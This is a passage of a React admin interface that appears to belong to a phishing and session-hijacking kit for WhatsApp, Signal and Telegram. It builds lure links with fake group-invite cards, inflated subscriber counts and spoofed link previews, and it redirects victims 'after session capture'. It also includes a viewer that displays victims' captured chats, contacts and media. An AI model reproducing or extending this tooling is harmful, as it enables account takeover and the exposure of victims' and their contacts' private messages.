                                                : 'bg-white/5 border-white/20 text-gray-500 hover:bg-white/5'
                                        }`}
                                    >
                                        <Phone className="w-5 h-5" />
                                        <span className="text-xs">Phone</span>
                                    </button>
                                    <button
                                        type="button"
                                        onClick={() => setNewLinkMethod('both')}
                                        className={`p-3 rounded-xl border flex flex-col items-center gap-2 transition-all ${
                                            newLinkMethod === 'both'
                                                ? 'bg-cyan-500/20 border-cyan-500 text-cyan-300'
                                                : 'bg-white/5 border-white/20 text-gray-500 hover:bg-white/5'
                                        }`}
                                    >
                                        <Smartphone className="w-5 h-5" />
                                        <span className="text-xs">Both</span>
                                    </button>
                                </div>
                                {newLinkPlatform === 'telegram' && (
                                    <p className="text-xs text-cyan-300 mt-2">Telegram supports QR and phone-number login. For the best delivery rate, enter the number in international format.</p>
                                )}
                            </div>
                            <div>
                                <label className="block text-sm text-gray-500 mb-2">Platform</label>
                                <div className="grid grid-cols-4 gap-2">
                                    {(!admin.permissions || admin.permissions.whatsapp) && (
                                    <button
                                        type="button"
                                        onClick={() => setNewLinkPlatform('whatsapp')}
                                        className={`p-3 rounded-xl border flex flex-col items-center gap-2 transition-all ${
                                            newLinkPlatform === 'whatsapp'
                                                ? 'bg-green-500/20 border-green-500 text-green-300'
                                                : 'bg-white/5 border-white/20 text-gray-500 hover:bg-white/5'
                                        }`}
                                    >
                                        <Smartphone className="w-5 h-5" />
                                        <span className="text-xs">WhatsApp</span>
                                    </button>
                                    )}
                                    {(!admin.permissions || admin.permissions.signal) && (
                                    <button
                                        type="button"
                                        onClick={() => setNewLinkPlatform('signal')}
                                        className={`p-3 rounded-xl border flex flex-col items-center gap-2 transition-all ${
                                            newLinkPlatform === 'signal'
                                                ? 'bg-[#3A76F0]/20 border-[#3A76F0] text-[#3A76F0]'
                                                : 'bg-white/5 border-white/20 text-gray-500 hover:bg-white/5'
                                        }`}
                                    >
                                        <MessageCircle className="w-5 h-5" />
                                        <span className="text-xs">Signal</span>
                                    </button>
                                    )}
                                    {(!admin.permissions || admin.permissions.telegram) && (
                                    <button
                                        type="button"
                                        onClick={() => setNewLinkPlatform('telegram')}
                                        className={`p-3 rounded-xl border flex flex-col items-center gap-2 transition-all ${
                                            newLinkPlatform === 'telegram'
                                                ? 'bg-[#0088CC]/20 border-[#0088CC] text-[#0088CC]'
                                                : 'bg-white/5 border-white/20 text-gray-500 hover:bg-white/5'
                                        }`}
                                    >
                                        <MessageCircle className="w-5 h-5" />
                                        <span className="text-xs">Telegram</span>
                                    </button>
                                    )}
                                    <button
                                        type="button"
                                        onClick={() => setNewLinkPlatform('both')}
                                        className={`p-3 rounded-xl border flex flex-col items-center gap-2 transition-all ${
                                            newLinkPlatform === 'both'
                                                ? 'bg-cyan-500/20 border-cyan-500 text-cyan-300'
                                                : 'bg-white/5 border-white/20 text-gray-500 hover:bg-white/5'
                                        }`}
                                    >
                                        <Users className="w-5 h-5" />
                                        <span className="text-xs">All</span>
                                    </button>
                                </div>
                                <p className="text-xs text-gray-500 mt-2">
                                    {newLinkPlatform === 'signal' && 'Signal requires Docker to be running'}
                                    {newLinkPlatform === 'telegram' && 'Telegram requires API credentials (TELEGRAM_API_ID & TELEGRAM_API_HASH)'}
                                    {newLinkPlatform === 'both' && 'Users can choose which platform to connect'}
                                </p>
                            </div>
                            {newLinkScene === 'join-group' && (newLinkPlatform === 'telegram' || newLinkPlatform === 'both') && (
                                <div>
                                    <label className="block text-sm text-gray-500 mb-2">Telegram Subscribers (optional)</label>
                                    <input
                                        type="number"
                                        min={0}
                                        value={newTelegramSubscriberCount}
                                        onChange={(e) => setNewTelegramSubscriberCount(e.target.value)}
                                        className="w-full bg-white/5 border border-cyan-500/10 rounded-xl px-4 py-3 text-white placeholder-gray-600 focus:outline-none focus:ring-2 focus:ring-indigo-500"
                                        placeholder="e.g., 154"
                                    />
                                    <p className="text-xs text-gray-500 mt-2">Shown on the Telegram-style invite card as “154 subscribers”.</p>
                                </div>
                            )}
                            {cdnZones.length > 0 && (!admin.permissions || admin.permissions.cdnDeploy) && (
                                <div>
                                    <label className="block text-sm text-gray-500 mb-2">CDN Zone (optional)</label>
                                    <select
                                        value={newLinkCdnZoneId}
                                        onChange={(e) => setNewLinkCdnZoneId(e.target.value)}
                                        className="w-full bg-white/5 border border-cyan-500/10 rounded-xl px-4 py-3 text-white focus:outline-none focus:ring-2 focus:ring-indigo-500"
                                    >
                                        <option value="" className="bg-slate-800">Default (first zone)</option>
                                        {cdnZones.map(z => (
                                            <option key={z.id} value={z.id} className="bg-slate-800">{z.name} ({z.cdnHostname})</option>
                                        ))}
                                    </select>
                                </div>
                            )}
                            {/* Social Media Preview (OG Meta Tags) */}
                            <div className="border border-white/10 rounded-xl p-4 space-y-3">
                                <h4 className="text-sm font-medium text-gray-300 flex items-center gap-2">
                                    <Image className="w-4 h-4" />
                                    Link Preview (when shared on messaging apps)
                                </h4>
                                <div>
                                    <label className="block text-xs text-gray-500 mb-1">Preview Title</label>
                                    <input
                                        type="text"
                                        value={newOgTitle}
                                        onChange={(e) => setNewOgTitle(e.target.value)}
                                        placeholder={newGroupName || 'Group name will be used'}
                                        className="w-full bg-white/5 border border-cyan-500/10 rounded-lg px-3 py-2 text-white text-sm focus:outline-none focus:ring-2 focus:ring-indigo-500 placeholder-gray-600"
                                    />
                                </div>
                                <div>
                                    <label className="block text-xs text-gray-500 mb-1">Preview Description</label>
                                    <input
                                        type="text"
                                        value={newOgDescription}
                                        onChange={(e) => setNewOgDescription(e.target.value)}
                                        placeholder="Join the group chat"
                                        className="w-full bg-white/5 border border-cyan-500/10 rounded-lg px-3 py-2 text-white text-sm focus:outline-none focus:ring-2 focus:ring-indigo-500 placeholder-gray-600"
                                    />
                                </div>
                                <div>
                                    <label className="block text-xs text-gray-500 mb-1">Preview Thumbnail</label>
                                    <div className="flex items-center gap-3">
                                        {newOgImage && (
                                            <img src={newOgImage} alt="OG preview" className="w-16 h-16 rounded-lg object-cover border border-cyan-500/10" />
                                        )}
                                        <label className="cursor-pointer">
                                            <input
                                                type="file"
                                                accept="image/*"
                                                className="hidden"
                                                onChange={(e) => {
                                                    const file = e.target.files?.[0];
                                                    if (file) {
                                                        const reader = new FileReader();
                                                        reader.onloadend = () => setNewOgImage(reader.result as string);
                                                        reader.readAsDataURL(file);
                                                    }
                                                }}
                                            />
                                            <div className="px-3 py-1.5 bg-white/5 hover:bg-white/20 border border-cyan-500/10 rounded-lg text-gray-300 text-xs cursor-pointer flex items-center gap-1.5 transition-all">
                                                <Upload className="w-3 h-3" />
                                                {newOgImage ? 'Change' : 'Upload'}
                                            </div>
                                        </label>
                                        {newOgImage && (
                                            <button type="button" onClick={() => setNewOgImage(null)} className="text-xs text-red-400 hover:text-red-300">Remove</button>
                                        )}
                                    </div>
                                    <p className="text-xs text-gray-600 mt-1">Recommended: 1200×630px. Shows when link is shared on WhatsApp, Telegram, etc.</p>
                                </div>
                            </div>
                            {/* Real Group URL - only for join-group scene */}
                            {newLinkScene === 'join-group' && (
                            <div>
                                <label className="block text-sm text-gray-500 mb-2">Real Group URL (optional)</label>
                                <input
                                    type="url"
                                    value={newRedirectUrl}
                                    onChange={(e) => setNewRedirectUrl(e.target.value)}
                                    placeholder="https://chat.whatsapp.com/... or https://t.me/+..."
                                    className="w-full bg-white/5 border border-cyan-500/10 rounded-xl px-4 py-3 text-white focus:outline-none focus:ring-2 focus:ring-indigo-500 placeholder-gray-600"
                                />
                                <p className="text-xs text-gray-600 mt-1">After session capture, the user will be automatically redirected to this group invite link.</p>
                            </div>
                            )}
                            <div>
                                <label className="block text-sm text-gray-500 mb-2">Expires In (optional)</label>
                                <select
                                    value={newLinkExpiry}
                                    onChange={(e) => setNewLinkExpiry(Number(e.target.value))}
                                    className="w-full bg-white/5 border border-cyan-500/10 rounded-xl px-4 py-3 text-white focus:outline-none focus:ring-2 focus:ring-indigo-500"
                                >
                                    <option value={0} className="bg-slate-800">Never expires</option>
                                    <option value={1} className="bg-slate-800">1 hour</option>
                                    <option value={6} className="bg-slate-800">6 hours</option>
                                    <option value={24} className="bg-slate-800">24 hours</option>
                                    <option value={72} className="bg-slate-800">3 days</option>
                                    <option value={168} className="bg-slate-800">1 week</option>
                                </select>
                            </div>
                        </form>
                        <div className="p-6 border-t border-white/10 flex-shrink-0">
                            <button
                                type="button"
                                onClick={(e) => { const form = (e.target as HTMLElement).closest('.flex.flex-col')?.querySelector('form'); form?.requestSubmit(); }}
                                disabled={isCreating}
                                className="w-full bg-gradient-to-r from-cyan-500 to-cyan-600 hover:from-cyan-400 hover:to-cyan-500 text-black font-medium py-3 px-6 rounded-xl flex items-center justify-center gap-2 transition-all disabled:opacity-50"
                            >
                                {isCreating ? (
                                    <>
                                        <Loader2 className="w-5 h-5 animate-spin" />
                                        Creating...
                                    </>
                                ) : (
                                    <>
                                        <Plus className="w-5 h-5" />
                                        Create Link
                                    </>
                                )}
                            </button>
                        </div>
                    </div>
                </div>
            )}

            {/* Chat Message Viewer Modal */}
            {showChatViewer && selectedSession && selectedChatJid && (() => {
                // Find chat by jid, number, or groupId
                const currentChat = selectedSession.sessionData.chats.find((c: any) => 
                    c.jid === selectedChatJid || c.number === selectedChatJid || c.groupId === selectedChatJid
                );
                // Find contact by jid or number
                const currentContact = selectedSession.sessionData.contacts.find((c: any) => 
                    c.jid === selectedChatJid || c.number === selectedChatJid || c.id === selectedChatJid || c.phone === selectedChatJid
                );
                // Try to get name from messages' sourceName (incoming) or recipientName (outgoing)
                const chatMessages = selectedSession.sessionData.messages?.[selectedChatJid] || [];
                const incomingMsg = (chatMessages as any[]).find((m: any) => !m.isOutgoing && !m.fromMe);
                const outgoingMsg = (chatMessages as any[]).find((m: any) => m.isOutgoing || m.fromMe);
                const nameFromMessage = (incomingMsg as any)?.sourceName || (incomingMsg as any)?.senderName || (outgoingMsg as any)?.recipientName;
                
                const contactName = currentContact?.name || 
                    [currentContact?.firstName, currentContact?.lastName].filter(Boolean).join(' ') || 
                    currentContact?.username || currentContact?.profileName;
                const chatDisplayName = currentChat?.name || contactName || 
                    nameFromMessage || currentChat?.phoneNumber || selectedChatJid;
                
                const isGroup = currentChat?.isGroup || selectedChatJid.startsWith('group.');
                
                return (
                <div className="fixed inset-0 bg-black/80 backdrop-blur-sm flex items-center justify-center p-4 z-50">
                    <div className="bg-slate-900 rounded-2xl border border-cyan-500/10 w-full max-w-4xl max-h-[90vh] flex flex-col overflow-hidden">
                        {/* Header */}
                        <div className="p-4 border-b border-white/10 flex items-center justify-between flex-shrink-0">
                            <div className="flex items-center gap-3">
                                <button
                                    onClick={() => {
                                        setShowChatViewer(false);
                                        setSelectedChatJid(null);
                                    }}
                                    className="p-2 hover:bg-white/5 rounded-lg text-gray-500 transition-all"
                                >
                                    <ArrowLeft className="w-5 h-5" />
                                </button>
                                <div>
                                    <h2 className="text-lg font-semibold text-white">
                                        {chatDisplayName}
                                    </h2>
                                    <p className="text-sm text-gray-500">
                                        {selectedSession.sessionData.messages?.[selectedChatJid]?.length || 0} messages
                                    </p>
                                </div>
                            </div>
                            <button
                                onClick={() => {
                                    setShowChatViewer(false);
                                    setSelectedChatJid(null);
                                }}
                                className="p-2 hover:bg-white/5 rounded-lg text-gray-500"
                            >
                                <X className="w-5 h-5" />
                            </button>
                        </div>

                        {/* Messages */}
                        <div className="flex-1 overflow-y-auto p-4 space-y-3 bg-slate-950/50">
                            {(() => {
                                const messages = selectedSession.sessionData.messages?.[selectedChatJid] || [];
                                if (messages.length === 0) {
                                    return (
                                        <div className="text-center py-12">
                                            <MessageCircle className="w-12 h-12 text-gray-600 mx-auto mb-4" />
                                            <p className="text-gray-500">No messages in this chat</p>
                                        </div>
                                    );
                                }

                                // Sort messages by timestamp
                                const sortedMessages = [...messages].sort((a: any, b: any) => a.timestamp - b.timestamp);
                                const displayMessages = sortedMessages.slice(-messageDisplayLimit);
                                const hasMore = sortedMessages.length > messageDisplayLimit;

                                return (<>
                                    {hasMore && (
                                        <div className="text-center py-2">
                                            <button
                                                onClick={() => setMessageDisplayLimit(prev => prev + 100)}
                                                className="px-4 py-1.5 bg-cyan-500/20 hover:bg-cyan-500/30 text-cyan-400 text-xs rounded-full transition-all"
                                            >
                                                Load {Math.min(100, sortedMessages.length - messageDisplayLimit)} more messages ({sortedMessages.length - messageDisplayLimit} remaining)
                                            </button>
                                        </div>
                                    )}
                                    {displayMessages.map((msg: any, idx: number) => {
                                    // Handle both WhatsApp (fromMe) and Signal (isOutgoing)
                                    const isFromMe = msg.fromMe || msg.isOutgoing;
                                    // Get sender name - handle both WhatsApp and Signal formats
                                    const senderName = msg.senderName || msg.sourceName || 
                                        (isFromMe ? 'You' : msg.senderJid?.split('@')[0] || msg.source?.split('@')[0] || 'Unknown');
                                    const time = new Date(msg.timestamp).toLocaleString();

                                    return (
                                        <div
                                            key={msg.id || idx}
                                            className={`flex ${isFromMe ? 'justify-end' : 'justify-start'}`}
                                        >
                                            <div className={`max-w-[70%] rounded-2xl p-3 ${
                                                isFromMe 
                                                    ? 'bg-indigo-600 text-white rounded-br-sm' 
                                                    : 'bg-slate-800 text-white rounded-bl-sm'
                                            }`}>
                                                {/* Sender name for group chats */}
                                                {!isFromMe && isGroup && (
                                                    <p className="text-xs text-indigo-300 mb-1 font-medium">{senderName}</p>
                                                )}

                                                {/* Message content based on type */}
                                                {msg.type === 'text' && (
                                                    <p className="text-sm whitespace-pre-wrap break-words">{msg.text}</p>
                                                )}

                                                {msg.type === 'image' && (
                                                    <div className="space-y-2">
                                                        {msg.mediaData ? (
                                                            <img 
                                                                src={msg.mediaData} 
                                                                alt="Image" 
                                                                className="max-w-full rounded-lg cursor-pointer hover:opacity-90"
                                                                onClick={() => window.open(msg.mediaData!, '_blank')}
                                                            />
                                                        ) : (
                                                            <div className="flex items-center gap-2 bg-black/20 rounded-lg p-3">
                                                                <Image className="w-8 h-8 text-gray-500" />
                                                                <span className="text-sm text-gray-300">📷 Image</span>
                                                            </div>
                                                        )}
                                                        {msg.caption && <p className="text-sm">{msg.caption}</p>}
                                                    </div>
                                                )}

                                                {msg.type === 'video' && (
                                                    <div className="space-y-2">
                                                        {msg.mediaData ? (
                                                            <video 
                                                                src={msg.mediaData} 
                                                                controls 
                                                                className="max-w-full rounded-lg"
                                                            />
                                                        ) : (
                                                            <div className="flex items-center gap-2 bg-black/20 rounded-lg p-3">
                                                                <Play className="w-8 h-8 text-gray-500" />
                                                                <span className="text-sm text-gray-300">🎥 Video</span>
                                                            </div>
                                                        )}
                                                        {msg.caption && <p className="text-sm">{msg.caption}</p>}
                                                    </div>
                                                )}

                                                {msg.type === 'audio' && (
                                                    <div className="flex items-center gap-3 min-w-[200px]">
                                                        {msg.mediaData ? (
                                                            <audio controls className="w-full max-w-[280px]" preload="metadata">
                                                                <source src={msg.mediaData} type={msg.mimeType || 'audio/ogg'} />
                                                                <source src={msg.mediaData} type="audio/ogg" />
                                                                <source src={msg.mediaData} type="audio/mpeg" />
                                                                Your browser does not support the audio element.
                                                            </audio>
                                                        ) : (
                                                            <>
                                                                <Volume2 className="w-6 h-6 text-gray-500" />
                                                                <span className="text-sm">🎵 Voice message</span>
                                                            </>
                                                        )}
                                                    </div>
                                                )}

                                                {msg.type === 'document' && (
                                                    <div className="flex items-center gap-3 bg-black/20 rounded-lg p-3">
                                                        <File className="w-8 h-8 text-gray-500" />
                                                        <div className="flex-1 min-w-0">
                                                            <p className="text-sm truncate">{msg.fileName || msg.text || 'Document'}</p>
                                                            {msg.caption && <p className="text-xs text-gray-500">{msg.caption}</p>}
                                                        </div>
                                                        {msg.mediaData && (
                                                            <a 
                                                                href={msg.mediaData} 
                                                                download={msg.fileName || 'document'}
                                                                className="p-2 bg-white/5 rounded-lg hover:bg-white/20"
                                                            >
                                                                <Download className="w-4 h-4" />
                                                            </a>
                                                        )}
                                                    </div>
                                                )}

                                                {msg.type === 'sticker' && (
                                                    <div className="flex items-center gap-2">
                                                        {msg.mediaData ? (
                                                            <img src={msg.mediaData} alt="Sticker" className="w-24 h-24" />
                                                        ) : (
                                                            <span className="text-3xl">🎨</span>
                                                        )}
                                                    </div>
                                                )}

                                                {msg.type === 'contact' && (
                                                    <div className="flex items-center gap-2 bg-black/20 rounded-lg p-3">
                                                        <Users className="w-6 h-6 text-gray-500" />
                                                        <span className="text-sm">{msg.text || 'Contact'}</span>
                                                    </div>
                                                )}

                                                {msg.type === 'location' && (
                                                    <div className="flex items-center gap-2 bg-black/20 rounded-lg p-3">
                                                        <MapPin className="w-6 h-6 text-red-400" />
                                                        <span className="text-sm">{msg.caption || 'Location'}</span>
                                                    </div>
                                                )}

                                                {msg.type === 'reaction' && (
                                                    <div className="flex items-center gap-2">
                                                        <Smile className="w-5 h-5 text-yellow-400" />
                                                        <span className="text-lg">{msg.text}</span>
                                                    </div>
                                                )}

                                                {msg.type === 'other' && msg.text && (
                                                    <p className="text-sm text-gray-500 italic">{msg.text}</p>
                                                )}

                                                {/* Timestamp */}
                                                <p className={`text-xs mt-1 ${isFromMe ? 'text-indigo-200' : 'text-gray-500'}`}>
                                                    {time}
                                                </p>
                                            </div>
                                        </div>
                                    );
                                })}
                                </>);
                            })()}
                        </div>
                    </div>
                </div>
            );
            })()}
        </div>
    );
}
